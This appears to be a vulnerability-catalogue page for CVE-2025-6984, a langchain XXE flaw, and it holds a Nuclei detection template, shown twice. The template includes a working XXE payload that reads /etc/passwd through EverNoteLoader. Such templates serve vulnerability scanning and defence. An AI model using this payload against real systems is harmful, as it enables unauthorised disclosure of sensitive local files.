langchain-ai langchain - XML External Entity Injection

CVE-2025-6984

Early Release

Description

langchain-ai/langchain 0.3.63 contains an XML External Entity (XXE) injection caused by insecure XML parsing in EverNoteLoader using etree.iterparse(), letting attackers disclose sensitive information, exploit requires crafted malicious XML payload.

Severity

High

CVSS Score

7.5

Published Date

September 8, 2025

Template Author

nukunga

CVE-2025-6984.yaml

id: CVE-2025-6984

info:
  name: langchain-ai langchain - XML External Entity Injection
  author: nukunga
  severity: high
  description: |
    langchain-ai/langchain 0.3.63 contains an XML External Entity (XXE) injection caused by insecure XML parsing in EverNoteLoader using etree.iterparse(), letting attackers disclose sensitive information, exploit requires crafted malicious XML payload.
  impact: |
    Attackers can disclose sensitive local files, potentially exposing critical system information.
  remediation: |
    Update to the latest version that disables external entity references in XML parsing.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6984
    - https://huntr.com/bounties/a6b521cf-258c-41c0-9edb-d8ef976abb2a
    - https://github.com/langchain-ai/langchain-community/commit/e842452
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-6984
    cwe-id: CWE-200
  metadata:
    verified: true
  tags: cve,cve2025,langchain,xxe,intrusive,file-write

self-contained: true

code:
  - engine:
      - py
      - python3

    source: |
      import tempfile
      import os
      from langchain_community.document_loaders import EverNoteLoader

      if __name__ == "__main__":

          xxe_payload = '''<?xml version="1.0" ?>
      <!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
      <note>
          <content>&example;</content>
      </note>'''

          # Write payload to temporary file
          with tempfile.NamedTemporaryFile(mode='w', suffix='.xml', delete=False) as f:
              f.write(xxe_payload)
              temp_file = f.name

          try:
              loader = EverNoteLoader(temp_file)
              print(loader.load())
          finally:
              os.unlink(temp_file)

    matchers:
      - type: word
        part: response
        words:
          - "root:"
          - "bin:"
          - "daemon:"
        condition: or
# digest: 4a0a004730450221009c621ac8672a85b22b22fa03298782b22e802b47f9509cd1de9bfcb26c254142022017b1de714ab947076ada80bc1664dabc6457aaba2470c4d079ceb45ece34d97a:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2025-6984

CWE ID:

cwe-200

References

https://nvd.nist.gov/vuln/detail/CVE-2025-6984 https://huntr.com/bounties/a6b521cf-258c-41c0-9edb-d8ef976abb2a https://github.com/langchain-ai/langchain-community/commit/e842452

Remediation Steps

Update to the latest version that disables external entity references in XML parsing.

id: CVE-2025-6984

info:
  name: langchain-ai langchain - XML External Entity Injection
  author: nukunga
  severity: high
  description: |
    langchain-ai/langchain 0.3.63 contains an XML External Entity (XXE) injection caused by insecure XML parsing in EverNoteLoader using etree.iterparse(), letting attackers disclose sensitive information, exploit requires crafted malicious XML payload.
  impact: |
    Attackers can disclose sensitive local files, potentially exposing critical system information.
  remediation: |
    Update to the latest version that disables external entity references in XML parsing.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6984
    - https://huntr.com/bounties/a6b521cf-258c-41c0-9edb-d8ef976abb2a
    - https://github.com/langchain-ai/langchain-community/commit/e842452
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-6984
    cwe-id: CWE-200
  metadata:
    verified: true
  tags: cve,cve2025,langchain,xxe,intrusive,file-write

self-contained: true

code:
  - engine:
      - py
      - python3

    source: |
      import tempfile
      import os
      from langchain_community.document_loaders import EverNoteLoader

      if __name__ == "__main__":

          xxe_payload = '''<?xml version="1.0" ?>
      <!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
      <note>
          <content>&example;</content>
      </note>'''

          # Write payload to temporary file
          with tempfile.NamedTemporaryFile(mode='w', suffix='.xml', delete=False) as f:
              f.write(xxe_payload)
              temp_file = f.name

          try:
              loader = EverNoteLoader(temp_file)
              print(loader.load())
          finally:
              os.unlink(temp_file)

    matchers:
      - type: word
        part: response
        words:
          - "root:"
          - "bin:"
          - "daemon:"
        condition: or
# digest: 4a0a004730450221009c621ac8672a85b22b22fa03298782b22e802b47f9509cd1de9bfcb26c254142022017b1de714ab947076ada80bc1664dabc6457aaba2470c4d079ceb45ece34d97a:922c64590222798bb761d5b6d8e72950

langchain-ai langchain - XML External Entity Injection

Description

Severity

CVSS Score

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

langchain-ai langchain - XML External Entity Injection

Description

Severity

CVSS Score

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps